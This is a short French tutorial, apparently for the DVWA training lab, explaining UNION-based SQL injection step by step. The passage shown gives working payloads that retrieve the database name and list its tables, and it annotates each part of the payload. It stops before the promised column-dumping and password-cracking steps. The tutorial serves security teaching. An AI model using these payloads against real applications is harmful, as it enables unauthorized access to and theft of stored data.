Injection SQL, récupération et cassage de mots de passe

Injections SQL

En utilisant des injections SQL, nous allons :

• Récupérer le nom de la base de données
• Récupérer le nom des tables
• Récupérer le nom des colonnes d’une table
• Récupérer le contenu d’une colonne d’une table

Récupérer le nom de la base de données

' UNION SELECT database(),2 FROM information_schema.tables #

‘ Rompre la requête initiale

UNION SELECT Forcer l’application à inclure les résultats d’une nouvelle requête dans le retour de la requête d'origine

database() Récupérer le nom de la base de données

2 Maintenir le nombre correct de colonnes dans la requête injectée

information_schema.tables contient une liste de toutes les tables de la base de données (en MySQL)

# Ignorer le reste de la requête initiale.

Récupérer le nom des tables

' UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema = 'dvwa' #

table_name Retourner le nom des tables